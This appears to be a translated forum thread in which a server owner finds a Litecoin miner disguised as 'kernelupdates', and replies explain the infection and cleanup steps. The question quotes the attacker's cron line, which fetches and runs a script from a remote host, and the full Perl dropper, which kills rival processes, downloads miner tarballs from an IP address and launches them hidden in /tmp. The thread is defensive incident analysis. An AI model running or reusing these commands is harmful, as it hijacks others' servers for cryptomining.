我有一个 CENTOS6 服务器运行一些 wordpress 和 tomcat 网站。这两天一直在崩溃。经过调查,我们发现 kernelupdates 二进制文件消耗了服务器上 100% 的 cpu。过程如下所述。
./kernelupdates -B -o stratum+tcp://hk2.wemineltc.com:80 -u spdrman.9 -p passxxx
但是这个过程似乎是无效的内核更新。可能是服务器被入侵并且这个进程是由黑客安装的,所以我已经杀死了这个进程并删除了 apache 用户的 cron 条目。
但不知何故,这个过程在几个小时后又开始了,而且 cron 条目也恢复了,我正在寻找正在修改 cron 作业的东西。
- 这个过程是否属于采矿过程?
- 我们如何才能停止 cronjob 修改并清理这个进程的源头呢?
cron 条目(apache 用户)
/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-web.com/.../abc.txt;perl abc.txt;rm -f abc*
abc.txt
#!/usr/bin/perl
system("killall -9 minerd");
system("killall -9 PWNEDa");
system("killall -9 PWNEDb");
system("killall -9 PWNEDc");
system("killall -9 PWNEDd");
system("killall -9 PWNEDe");
system("killall -9 PWNEDg");
system("killall -9 PWNEDm");
system("killall -9 minerd64");
system("killall -9 minerd32");
system("killall -9 named");
$rn=1;
$ar=`uname -m`;
while($rn==1 || $rn==0) {
$rn=int(rand(11));
}
$exists=`ls /tmp/.ice-unix`;
$cratch=`ps aux | grep -v grep | grep kernelupdates`;
if($cratch=~/kernelupdates/gi) { die; }
if($exists!~/minerd/gi && $exists!~/kernelupdates/gi) {
$wig=`wget --version | grep GNU`;
if(length($wig>6)) {
if($ar=~/64/g) {
system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;wget http://5.104.106.190/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates");
} else {
system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;wget http://5.104.106.190/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates");
}
} else {
if($ar=~/64/g) {
system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;curl -O http://5.104.106.190/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates");
} else {
system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;curl -O http://5.104.106.190/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates");
}
}
}
@prts=('8332','9091','1121','7332','6332','1332','9333','2961','8382','8332','9091','1121','7332','6332','1332','9333','2961','8382');
$prt=0;
while(length($prt)<4) { $prt=$prts[int(rand(19))-1]; }
print "setup for $rn:$prt done :-)\n";
system("cd /tmp/.ice-unix;./kernelupdates -B -o stratum+tcp://hk2.wemineltc.com:80 -u spdrman.".$rn." -p passxxx &");
print "done!\n";
此过程是莱特币(一种替代加密货币)矿工过程。有权访问您的服务器的人正在使用您的服务器生成莱特币(= 赚钱)。这个
kernelupdates名字很可能只是让你感到困惑。在您删除任何内容之前,我建议您备份您拥有的所有内容并找出这些内容是如何放入您的服务器的。如果您删除它但不删除安全问题,它很可能会再次出现。我会押注 Wordpress 或一些过时的插件来解决安全漏洞。
在找到并修复安全问题之后,尝试在 syslog 中查看您的 cron 日志。这可能会告诉您如何插入 cronjob。
我只是在我的服务器上受到了这个危害。我可以在我的日志中看到我在一个旧的 wordpress 网站上被击中,然后几秒钟后他们让 cron 作业一遍又一遍地运行。有趣的是,我已经拥有这个站点很长一段时间了,并且仅在我切换到 nginx 和 php-fpm 时才发生,您的设置是否相同?
我希望发生的一切是他们能够通过 php/wordpress 中的漏洞安装这些 cron 作业,基本上他们:
crontab -e以触发 cron 作业/tmp/abc.txt.1并执行/etc/.ice-unix重命名kernelupdates并启动它另请注意,莱特币用户名在
spdrman.2和之间略有不同spdrman.10。一件事,请检查您的 /etc/passwd 为您的 apache 用户。我将我的外壳愚蠢地设置为
/bin/bash这可能更安全设置为/bin/false此外,如果可能,请确保您的 apache 用户无法执行诸如 、 或 之类的命令
crontab,wget或者curl阻止这种情况再次发生。这些命令似乎是他们进入时所做工作的核心。作为预防措施,我再次更改我的 ssh 端口,我已经仔细检查并设置
PermitRootLogin no了 sshd 设置,所以我很确定他们不能直接以 root 身份进入我也得到了这个东西,显然一个用户的密码不知何故泄露了。到目前为止我做了什么:
sudo crontab -e -u <user>sudo usermod -s /usr/sbin/nologin <user>(尝试/sbin/nologin或/bin/false如果不可用)~/.ssh/authorized_keyschkrootkit并rkhunter运行它(只是误报)接下来要做的是重建整个服务器。它只是一个虚拟机,无论如何我都想使用Ansible来自动化配置,但匆忙做这件事仍然没有乐趣。但这是确保没有任何东西被篡改的唯一方法。
发生在我的一位客户身上。当您发现安全漏洞时,一个简单的解决方法是阻止从 updates.dyndn-web.com 下载以及为受影响的用户禁用 crontab。(前面提到的crontab + bin/false 解决方案)
这将禁用用户 www-data 的 crontab
以下将禁用从 updates.dyndn-web.com 下载脚本
注意:使用的脚本正在杀死 "named" system("killall -9 named");
我刚刚向@wemineltc 发了推文,要求他们禁止用户 spdrman 并将他/她的 LTC 转移到慈善机构,我邀请你转发。
https://twitter.com/jflaflamme/status/473307793240248320
根据您提供的 perl 脚本,您的服务器已被入侵。我强烈建议安装 chrootkit (yum install chrootkit) 并检查文件系统。我还建议禁用该 cronjob,以免更新 rootkit。
五天前在opensuse服务器上出现了同样的问题;使用的脚本正是我在服务器上找到的(相同的用户名和密码集)、相同的 cron、at 和 ips。还用 ps 检查卡住的 /usr/bin/host 进程;该过程使用 LD_PRELOAD 加载动态库,在我的情况下为 libworker.so(每次从 at 作业调用 /usr/bin/host 时删除),它尝试连接到 update-dyndn-web.com 执行 POST 到 . ../xenta.php。它与用于构建动态库的修改后的 shellcode 一起工作(转储程序是用 php 编写的,适合与 wordpress 一起使用)。
我希望这会有所帮助。